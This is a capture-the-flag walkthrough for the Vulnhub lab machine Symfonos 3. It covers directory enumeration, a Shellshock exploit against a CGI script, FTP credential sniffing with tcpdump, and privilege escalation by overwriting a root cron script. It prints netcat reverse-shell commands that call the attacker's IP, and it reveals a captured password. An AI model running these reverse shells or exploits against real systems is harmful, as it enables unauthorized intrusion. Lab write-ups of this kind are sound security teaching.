- Published on
Vulnhub - Symfonos 3
Today, We are going to pwn Symfonos 3 by Zayotic from Vulnhub
Description:
Intermediate real life based machine designed to test your skill at enumeration. If you get stuck remember to try different wordlist, avoid rabbit holes and enumerate everything thoroughly. SHOULD work for both VMware and Virtualbox.
For hints you're welcome to contact me via Twitter @zayotic
Download Link : https://www.vulnhub.com/entry/symfonos-3,332/
Lets Begin with our Initial Scan
Nmap Scan Results:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
| 256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_ 256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:66:C0:36 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
HTTP :
It's an normal webpage with an image. 
Started my Gobuster to find anything useful.
root@w0lf:~# gobuster dir -u http://192.168.1.102/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.102/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/11 18:35:35 Starting gobuster
===============================================================
/gate (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/11 18:36:04 Finished
===============================================================
/gate 
So another image like before, started Gobuster again on this page.
root@w0lf:~# gobuster dir -u http://192.168.1.102/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.102/gate/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/11 18:36:38 Starting gobuster
===============================================================
/cerberus (Status: 301)
===============================================================
2020/03/11 18:37:05 Finished
===============================================================
/cerberus 
Again it displays an image, I think we need to keep on digging until we found something interesting.
I used the same wordlist but it found nothing. The creator gave us a hint to try using different wordlist so I switched to another.
root@w0lf:~# gobuster dir -u http://192.168.1.102/gate/cerberus/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.102/gate/cerberus/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/11 18:57:55 Starting gobuster
===============================================================
/index.html (Status: 200)
/tartarus (Status: 301)
===============================================================
2020/03/11 18:57:56 Finished
===============================================================
/tartarus 
I did curl on this website and found an message.br/ 
So Its an Rabbit Hole.
root@w0lf:~# gobuster dir -u http://192.168.1.102/gate/cerberus/tartarus/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.102/gate/cerberus/tartarus/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/11 18:59:13 Starting gobuster
===============================================================
/research (Status: 200)
/hermes (Status: 301)
/charon (Status: 301)
===============================================================
2020/03/11 18:59:42 Finished
===============================================================
After this I can't view the pages.
I started Gobuster again with different wordlist from the first.
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.102
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/11 19:13:52 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cgi-bin/ (Status: 403)
/gate (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/11 19:13:55 Finished
===============================================================
Now we got new directory /cgi-bin/ Started Gobuster on this directory.
root@w0lf:~# gobuster dir -u http://192.168.1.102/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.102/cgi-bin/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/11 19:14:50 Starting gobuster
===============================================================
/underworld (Status: 200)
===============================================================
2020/03/11 19:15:20 Finished
===============================================================
Now we found /underworld Let's check whats there. The website is doing uptime command.
uptime - Tell how long the system has been running.
We can use that on our machine too by typing uptime
root@w0lf:~/CTF/Vulnhub/Symfonos3# uptime
19:20:48 up 54 min, 1 user, load average: 0.56, 0.69, 0.62
So this might be a ShellShock Vulnerability.
/cgi-bin is a folder used to house scripts that will interact with a Web browser to provide functionality for a Web page or website.
Reference:
https://null-byte.wonderhowto.com/how-to/exploit-shellshock-web-server-using-metasploit-0186084/
Method 1 (Metasploit):
- Changed TARGETURI /cgi-bin/underworld/
- Changed RHOST 192.168.1.102
We will get user cerberus shell.
Method 2 :
Searched shellshock in Searchsploit and it displays some exploits. I choosed BASH 
According to the example
php 34766.php -u http://192.168.1.102/cgi-bin/underworld/ -c "nc -e /bin/bash 192.168.1.103 1234"
Got cerberus shell.
Uploaded my Linux Enumeration Script but didn't found anything useful. So uploaded my Pspy to see anything running on the background.
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.
There is a python script running on the background ftpclient.py sending some data to ftp. We don't have permission to view the python script. Since ftp is Plain text we can capture those packets and view them in wireshark. 
We can use tcpdump
tcpdump - dump traffic on a network
cerberus@symfonos3:/tmp$ tcpdump -D
1.enp0s17 [Up, Running]
2.any (Pseudo-device that captures on all interfaces) [Up, Running]
3.lo [Up, Running, Loopback]
4.nflog (Linux netfilter log (NFLOG) interface)
5.nfqueue (Linux netfilter queue (NFQUEUE) interface)
6.usbmon1 (USB bus number 1)
-D Print the list of the network interfaces available on the system and on which tcp‐dump can capture packets.
$ tcpdump -i lo -w tcp.pcap
tcpdump -i lo -w tcp.pcap
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
- -w
- -i Listen on interface
Run this for few moment. And Started Python server in the machine and downloaded the ftp.pcap to my machine. 
I used Wireshark to see whats there and found User Hades Password. 
Logged in SSH with hades:PTpZTfU4vxgzvRBEbr/ 
Privilege Escalation:
We know the python script is in /opt/ftpclient and now we have permission to write on the script.
Removed that old script and I created a reverse shell python script in my machine and uploaded it to the machine. 
import sys
import os
os.system("nc -e /bin/bash 192.168.1.103 1234")
Started my NC listener and wait for sometime and BOOM I'm root!
